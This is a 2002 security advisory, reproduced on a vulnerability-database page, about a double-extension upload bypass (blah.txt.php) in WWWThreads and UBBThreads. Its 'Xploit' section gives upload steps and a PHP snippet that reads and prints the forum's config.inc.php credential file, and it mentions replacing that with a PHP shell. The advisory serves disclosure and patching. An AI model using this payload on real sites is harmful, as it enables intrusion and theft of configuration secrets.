Lucene search

K

wwwthreads-5.5.txt

🗓️ 02 Feb 2002 00:00:00Reported by hop.toType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 15 Views

Security hole in WWWThreads and UBBThreads allows unauthorized file uploads using extension tricks.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`---------- Forwarded message ----------  
Date: 30 Jan 2002 22:12:17 -0000  
From: Root Extractor <[email protected]>  
To: [email protected]  
Subject: [ WWWThreads, UBBThreads ] Security Hole in upload system  
  
  
  
[ WWWThreads, UBBThreads ] Security Hole in  
upload system  
  
Author: RootExtractor, CompuMe  
[email protected], [email protected]  
  
I. Details  
II. Vulnerable ver's  
III. Example, Xploit  
IV. Solution  
  
Details :  
  
..: config.inc.php :..  
- ------------------------- snip ------------------------------  
  
// $config['excludefiles']  
= ".php,.asp,.js,.vbs,.sht,.htm";  
$config['allowfiles'] = ".zip,.txt,.gif,.jpg,.jpeg,.bmp";  
  
- ------------------------- snip ------------------------------  
  
  
that files that were not listed in the allow files could  
still be uploaded. Seems you checked the extension  
but if someone added an allowable extension first  
before the bogus extension the file would upload.  
  
vulnerable :  
WWWThreads and UBBThreads 5.5 Dev11 and piror  
  
not vulnerable :  
UBBThreads 5.5  
  
Example :  
you allow the upload or .txt,.jpg,.bmp,.zip  
all files that don't have those extensions should not  
be uploaded  
However if somebody changes the name of the file to  
blah.txt.php the file will validate and upload......huh !  
  
Xploit :  
1) make new file $ touch blah.txt.php  
2) edit it $ vi blah.txt.php (in this step, write a php  
code, for example)  
  
<?php  
$readfile = join("", file  
("../config.inc.php"));  
print $readfile;  
?>  
  
3) save & upload it  
4) visit your blah file, now you can to see a config file  
of your victim forum  
5) i'm replaced readfile code by php shell file  
  
  
Solution :  
visit infopop.com and download ubbthreads 5.5  
http://www.infopop.com/  
  
  
Copyright 2002 recm security team  
http://hop.to/condor  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
02 Feb 2002 00:00Current
7.4High risk
Vulners AI Score7.4
15
.json
Report